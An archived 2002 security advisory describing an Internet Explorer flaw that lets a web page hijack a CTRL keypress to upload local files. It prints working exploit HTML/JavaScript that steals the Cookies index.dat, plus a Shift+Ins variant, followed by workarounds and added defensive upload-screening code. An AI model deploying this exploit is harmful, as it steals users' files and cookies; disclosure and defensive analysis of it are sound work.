24th Jul 2002 [SBWID-5549]
COMMAND
IE may let a remote web site upload any of your local files when you press
control keys
SYSTEMS AFFECTED
IE with javascript enabled
PROBLEM
Thanks to:
_ _
o' ,=./ `o
Andreas Sandblad [sandblad@acc.umu.se] (o o) advisory [#8]
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
A specially crafted web page can retrieve any local file using simple
JavaScript. This is possible by performing the following steps:
1. When a user presses the CTRL key, an onkeydown event handler fires. In
the handler the pressed key is changed to 'V'. The result is a paste
operation, which is subject to fewer restrictions than a scripted one.
2. The content of the clipboard is altered and focus is moved to a
hidden file upload form. The paste operation is performed into the
form, which changes the value of the file upload field (something script
is not normally allowed to do).
3. The upload form is submitted automatically (a legal JavaScript
operation).
It isn't necessary to know the exact path to local files, because a file
can be referred to relatively as "..\filename".
Furthermore, if the local file "..\LOCALS~1\TEMPOR~1\CONTENT.IE5\index.dat"
is uploaded, the randomly named directories needed to build the exact
path to the Temporary Internet Files folders can be retrieved. Knowing
the exact path, a compiled help file (.chm) can be dumped there and
launched with showHelp() (the old .chm attack). A compiled help file is
allowed to contain instructions that execute arbitrary programs.
EXPLOIT:
Instructions
============
Put the HTML code in a remote HTML document and load it with Internet
Explorer. Activate the exploit by pressing CTRL. You must prepare a
server-side script to take care of the upload process ("upload.php").
If you choose to use PHP, I recommend
http://www.php.net/manual/en/features.file-upload.php as a reference on
how to set up a server-side script that handles a file upload.
Note
====
1. Please remove all "!" characters in the exploit code. They have been
inserted to decrease false virus alarms triggered by this mail.
2. Default settings are assumed.
Exploit
=======
-------------------------- CUT HERE -------------------------------
<!div id=h style="zoom:0.0001">
<!form name=u enctype="multipart/form-data" method=post action=upload.php>
<!input type=file name=file></form></div>
<!script>
//uploadFile="..\LOCALS~1\TEMPOR~1\CONTENT.IE5\index.dat";
uploadFile="..\Cookies\index.dat";
function gotKey(){
if (!event.ctrlKey) return;
document.onkeydown = null;
event.keyCode = 86;
window.clipboardData.setData("Text",uploadFile);
(p=document.forms.u.file).focus();
p.onpropertychange = function(){document.forms.u.submit()};
} document.onkeydown = gotKey;
window.onload=function(){document.body.focus()};
<!/script>
-------------------------- CUT HERE -------------------------------
Update (25 July 2002)
======
Thor Larholm of PivX Solutions, LLC [http://www.PivX.com] adds:
Of course, this also works with key combinations such as Shift+Ins,
just change event.ctrlKey to event.shiftKey and 86 to 45 :)
SOLUTION
Microsoft proposed the following possible workarounds:
1. Disable, or set to prompt, the "Submit nonencrypted form data" option
2. Disable "Allow paste operations via script" (best)
3. Disable active scripting
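The workarounds above are client-side settings. On the receiving end, the attack leaves a
recognisable trace: the filename parameter the browser sends in the multipart part is the
pasted relative path (for example "..\Cookies\index.dat"), so an upload handler that inspects
that parameter can refuse and log such requests. The following is an added example, not
code from the advisory or from Andreas Sandblad; the function and constant names
(parseContentDisposition, checkUploadName, auditParts, SUSPECT_BASENAMES) and the sample
header lines are this example's own constructions.

```javascript
// Added example (not from the advisory): server-side screening of the
// client-supplied filename in a multipart/form-data upload. The attack
// pastes a relative path into the file field, so the filename parameter
// carries "..\..." segments or a known browser profile file name. A
// receiving script should never trust that parameter: reject traversal
// style names, flag the index.dat files the advisory targets, and keep
// only a basename for anything accepted.

// Basenames of the IE profile files named in the advisory (constructed
// watchlist; extend for your own environment).
const SUSPECT_BASENAMES = new Set(["index.dat"]);

// Parse the Content-Disposition header line of one multipart part.
// Returns { name, filename }; filename is undefined when the part carries
// no file. Backslashes inside the quoted value are kept as-is, since a
// Windows path legitimately contains them; only \" is unescaped.
function parseContentDisposition(header) {
  const out = {};
  const re = /;\s*(name|filename)="((?:[^"\\]|\\.)*)"/g;
  let m;
  while ((m = re.exec(header)) !== null) {
    out[m[1]] = m[2].replace(/\\"/g, '"');
  }
  return out;
}

// Classify a client-supplied filename.
// Returns { safeName, verdict, reason }: verdict is "accept" or "reject";
// safeName is the basename (both separator styles stripped) or null.
function checkUploadName(filename) {
  if (typeof filename !== "string" || filename.length === 0) {
    return { safeName: null, verdict: "reject", reason: "empty filename" };
  }
  const segments = filename.split(/[\\/]+/);
  // A ".." segment anywhere is the relative-path trick from the advisory.
  if (segments.some((s) => s === "..")) {
    return { safeName: null, verdict: "reject", reason: "parent-directory traversal in filename" };
  }
  const base = segments[segments.length - 1];
  if (base === "" || base === ".") {
    return { safeName: null, verdict: "reject", reason: "no basename" };
  }
  // Old IE sent the full local path, so an absolute path is not suspicious
  // by itself; the basename still decides whether the file is accepted.
  if (SUSPECT_BASENAMES.has(base.toLowerCase())) {
    return { safeName: null, verdict: "reject", reason: "browser profile file " + base };
  }
  return { safeName: base, verdict: "accept", reason: "ok" };
}

// Constructed sample header lines, shaped as IE would send them for the
// two paths in the advisory plus one ordinary document.
const SAMPLE_PARTS = [
  'form-data; name="file"; filename="..\\Cookies\\index.dat"',
  'form-data; name="file"; filename="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat"',
  'form-data; name="file"; filename="C:\\docs\\report.pdf"',
];

// Run the check over a list of header lines; returns one record per part,
// suitable for logging the rejected ones.
function auditParts(parts) {
  return parts.map((h) => {
    const { filename } = parseContentDisposition(h);
    return { filename, ...checkUploadName(filename) };
  });
}

if (typeof require !== "undefined" && require.main === module) {
  for (const r of auditParts(SAMPLE_PARTS)) {
    console.log(r.verdict.padEnd(7), r.reason.padEnd(40), r.filename);
  }
}

module.exports = { parseContentDisposition, checkUploadName, auditParts, SAMPLE_PARTS };
```

The check deliberately looks at path segments rather than at the raw string, so both "..\" and "../" forms are caught, and a rejection is logged with the original filename so the event can be correlated with the requesting client.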